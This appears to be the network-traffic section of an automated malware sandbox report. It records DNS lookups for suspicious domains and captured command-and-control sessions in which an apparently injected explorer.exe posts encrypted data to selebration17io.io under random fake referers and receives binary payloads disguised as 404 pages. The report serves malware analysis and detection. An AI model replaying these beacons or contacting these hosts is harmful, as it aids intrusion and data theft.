                                                                                                                                                                    Feb 8, 2024 19:09:44.943862915 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com201.119.31.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com189.232.12.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.107.163.44A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943876028 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com201.119.31.110A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com189.232.12.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.107.163.44A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:44.943886042 CET1.1.1.1192.168.2.30x35aNo error (0)emgvod.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:09:52.937339067 CET152.89.198.214192.168.2.30x9504No error (0)bercekp.com185.196.8.22A (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:10:43.721916914 CET1.1.1.1192.168.2.30xc38Server failure (2)anfesq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:10:43.721957922 CET1.1.1.1192.168.2.30xc38Server failure (2)anfesq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:11:11.780755997 CET1.1.1.1192.168.2.30x1f79Server failure (2)anfesq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:11:11.780771017 CET1.1.1.1192.168.2.30x1f79Server failure (2)anfesq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:00.637352943 CET1.1.1.1192.168.2.30xb1b4Server failure (2)tceducn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:00.637367010 CET1.1.1.1192.168.2.30xb1b4Server failure (2)tceducn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:00.637378931 CET1.1.1.1192.168.2.30xb1b4Server failure (2)tceducn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:00.637442112 CET1.1.1.1192.168.2.30xb1b4Server failure (2)tceducn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:02.173819065 CET1.1.1.1192.168.2.30x63aServer failure (2)arrunda.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:02.173841000 CET1.1.1.1192.168.2.30x63aServer failure (2)arrunda.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Feb 8, 2024 19:12:02.834763050 CET1.1.1.1192.168.2.30xb47cServer failure (2)soetegem.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.34971191.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:08:41.056437969 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://rtuqgidsojnc.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:41.056557894 CET332OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e3 fd 44 fd
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bOD$z&;GzuF-88>6eDi[#<ss7#=>A%}aBbA)u3&+@Pf5EB9%3";MQaD4.&
                                                                                                                                                                    Feb 8, 2024 19:08:41.312629938 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=R0
                                                                                                                                                                    Feb 8, 2024 19:08:41.318748951 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://mlprwucltvv.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 133
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:41.318829060 CET133OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 f2 b4 3b c9
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO;<3Do,l>GQfo4D"Vq
                                                                                                                                                                    Feb 8, 2024 19:08:41.574143887 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:08:41.578783989 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://agoteifvytfannxv.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 186
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:41.578900099 CET186OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 9e ce 26 ee
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO&pN1K<tcRMx/6yS(, $gWn.-'T/x(?g
                                                                                                                                                                    Feb 8, 2024 19:08:41.836065054 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 39 bf 78 97 a6 a9 11 3b f6 52 dd e7 65 8e 1e 0d d3 13 3f 14 5b 63 17 9e 67 ac 9c cf 95 88 de af bc 62 a8 01 bd ec a9 95 32 96 d1 46 97 ea 13 19 80 03 92 61 c4 86 c5 54 53 7e 30 c6 1c 60 ae 6f 88 72 4b dd 54 f6 b8 1a 45 72 b6 ed f7 a2 3d bf 6c 13 d9 06 80 e3 a7 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 55 2b 98 c3 00 1f 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 12 52 c5 03 45 ca a1 61 7e de f5 45 af 19 17 7e 4f af 9a a5 74 d4 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 df 4a 9a 07 fd ec 31 dc 64 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 1d f2 d1 4f 6b 79 82 ae 9c a7 1c 4c 45 ae ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac c7 bc c4 55 25 af ba 68 b2 59 e2 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 b4 5f 40 db 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 29 97 aa 1b 6f d3 cb 29 32 32 fa 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 a7 d0 1f e4 a6 4d 0d 9f 10 8f d9 b0 99 19 84 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb 45 fa 17 28 d2 de 5b 1f d0 83 aa 7a 8f a2 76 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 ad 88 71 4a ba 80 7e 31 a6 70 d4 03 eb b2 98 76 6c 0f ca 82 b9 38 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 21 6f 11 18 3a 1d f8 8d a3 ae 88 c1 d4 bf 33 25 77 da a9 c3 90 d5 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 d9 3d fb d8 ea 94 62 97 52 b9 c5 ea 9e 13 c8 a6 4c 45 e5 f0 73 8d c1 c4 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 02 03 81 56 51 aa 5d 55 fe df 3c 42 66 98 de 9e 73 3f a8 65 a2 df 1f 78 60 be 2d 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 90 e9 f3 72 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d dc 6c 0f 73 ea 3d c3 89 f1 b5 e8 c1 d2 27 ab 35 a4 9c cb fa 4e 1c a0 dc 23 02 b0 14 b7 03 ad 55 82 4b bf ec b4 97 6b ed f4 8c d6 27 a1 b9 6c 99 5a 36 55 5e 5c 2e ef 57 c4 9d a9 ae 1b 62 39 cb 85 a7 dd 65 56 f1 32 02 76 e9 1d b1 08
                                                                                                                                                                    Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*9x;Re?[cgb2FaTS~0`orKTEr=l3Ob>!Z:V?#BSSQU+~ExU$$REa~E~OtzN.%Qa?|(HkJ1d/MF$l#l)l~qhJOkyLEW;*r#u1yr+Lc1<'i3FHU%hY?U@Wd{9f(_@=fd0QpKk1*:TU)o)22[P&}WL\h[bX?MtyPmCbzJE([zv7 R:VcqJ~1pvl8.5)C!o:3%w/#wN=bRLEsRW!}VQ]U<Bfs?ex`-_xm^2rB9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=ls='5N#UKk'lZ6U^\.Wb9eV2v
                                                                                                                                                                    Feb 8, 2024 19:08:41.836092949 CET1286INData Raw: 0c 1c 73 ea 98 e9 f3 a4 34 af 71 e0 0a d6 5d a3 ab 35 ca b4 e7 53 18 ed cf 44 43 7a aa 61 5c 1c b9 27 5b 45 67 32 f7 c7 8b 28 e0 6e eb d8 9e 55 4b 7b 4b 19 1f 29 4d 54 44 d8 7b 79 5b 33 9f 4b 24 25 c5 75 f6 46 0a 5e 2a 86 0e 41 bf 60 ef 5d a3 d9
                                                                                                                                                                    Data Ascii: s4q]5SDCza\'[Eg2(nUK{K)MTD{y[3K$%uF^*A`]L|:k\dPAsoH%HFMZ{Nf4+2y9#X7aC:TqufLJ~!K=0?#Os \x$>"n`lO!|
                                                                                                                                                                    Feb 8, 2024 19:08:41.836107016 CET1286INData Raw: 5c e2 e6 b7 0a ee 70 a1 ec 99 d8 0b 8c 09 58 4c 20 52 ef a6 aa 52 72 38 2e 38 ad bc 99 a2 2f d4 f8 8b fd c5 d0 2c 38 54 57 bc a6 cd ed b3 cf bd 39 06 9f ad 11 46 b8 75 13 4d 98 bd 67 cc 30 17 b5 bb 60 70 4a 4f 4f e8 66 43 be d7 1a 05 0e b9 be 08
                                                                                                                                                                    Data Ascii: \pXL RRr8.8/,8TW9FuMg0`pJOOfCrl) W U//}Y#X$^V7mvTJ#C1*;%G-`{0S.2ISA5$<szW.hH44R(&1@It.
                                                                                                                                                                    Feb 8, 2024 19:08:41.836124897 CET1286INData Raw: cf c7 20 0b c4 70 09 b3 10 09 5a dd b2 07 4a 9c 3b 89 eb 36 50 29 35 66 d4 8c 7d 2b 51 d8 c7 c1 e6 1a e6 05 02 ba 68 90 ae ee f0 99 1a 3d 4b f6 35 d7 39 1f 01 d4 5b ce e5 70 6e aa df 73 ec da 03 be e9 b2 7a 14 90 5a 63 f1 3b c4 2c 58 01 31 a6 ed
                                                                                                                                                                    Data Ascii: pZJ;6P)5f}+Qh=K59[pnszZc;,X1uvq[db(~e;pe&(Sw'4[*}h=LAVu#j"IsJ~\'!}PoR7 MWHPfIu8c[Dw`Vfe
                                                                                                                                                                    Feb 8, 2024 19:08:41.836242914 CET1286INData Raw: dd 17 fc 99 fb ae b4 a3 fb 43 01 6c 75 11 15 ca 96 da 4b ca 48 ad 36 0d 28 d2 26 6f 3a 8f 91 7d 56 59 1e e1 4f 8e 05 da 4d dd 0c 41 6d df 59 60 e6 04 37 e4 66 5c 72 bd 0f bf a8 7b 3b 21 0c b3 d3 8f e4 8f d1 a7 c8 eb 30 1f c9 d8 05 81 54 5d 79 21
                                                                                                                                                                    Data Ascii: CluKH6(&o:}VYOMAmY`7f\r{;!0T]y!.Z>jACqe&Kzd9,#Bp;;|3K*h-Ah9ID<cs+3D8i-DkU6-qK(W[r@gOV8B.j:202%@X*c
                                                                                                                                                                    Feb 8, 2024 19:08:41.836256981 CET1286INData Raw: 89 f0 17 d5 96 b9 33 00 4a e0 c3 58 29 e8 85 2b 66 ee 66 43 16 a8 20 86 92 36 eb 9c 13 52 88 7b b8 69 f0 a0 fc df 1d ca 54 34 a3 2e 5d bb 80 1a de 23 1a 12 d5 9f 2c cc 35 1a bd 44 18 ba e4 c8 37 ea 9d b6 25 a1 eb 9a 73 51 30 50 b9 91 31 28 29 6b
                                                                                                                                                                    Data Ascii: 3JX)+ffC 6R{iT4.]#,5D7%sQ0P1()k.PC-Bmdt>=M.2s"YNJnX7:8"YzQ(lh{XRm(Jo(wonTtARs]U,^=R!7[M
                                                                                                                                                                    Feb 8, 2024 19:08:41.836270094 CET1286INData Raw: 0f da b7 be eb 42 4c 2b a8 df a3 16 9e 7c 9e 03 8c 9e 2e 87 ab 38 be 89 89 3e 1b 7d 3e b9 8f 4c a1 d4 c6 27 7b 1c 16 d6 6d 0e b9 ca 21 ec ce a7 63 20 06 8f 88 7e 1e f6 52 e9 b3 84 ca 46 1b c5 e9 03 44 d4 63 1a 84 1e 75 42 88 f8 7a 0c 8f a1 9e e7
                                                                                                                                                                    Data Ascii: BL+|.8>}>L'{m!c ~RFDcuBz~G M`]MC/i3A8Z&$vVb1]m+fz%f66H^,E-Ae7LI}!:`{;^)B3P@5!t2`h2?
                                                                                                                                                                    Feb 8, 2024 19:08:41.836287022 CET1286INData Raw: 5e a8 06 f6 04 d7 cf 10 fe b1 04 7d a7 6e 8a e4 22 9c 75 d6 7d 27 75 21 aa e4 a6 11 bc 8c f4 0f b6 b3 4c f5 7b d8 c6 93 eb ff b1 31 b4 c0 c3 68 67 ce ad 28 ab ac 01 f0 bc 24 27 51 73 96 82 14 32 97 84 86 9c d6 af bf c9 2b ce b2 db 74 a8 f7 38 95
                                                                                                                                                                    Data Ascii: ^}n"u}'u!L{1hg($'Qs2+t843*SBw=3l^hB9_}Syr-/tpJUkg:"4lAa{j1B_H~e|/<o?% |soV-[\
                                                                                                                                                                    Feb 8, 2024 19:08:44.174225092 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://fllvspgbybaa.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 345
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:44.429826021 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:44 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Feb 8, 2024 19:08:44.434135914 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://styglpngamijwt.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 259
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:08:44.692378998 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:44 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
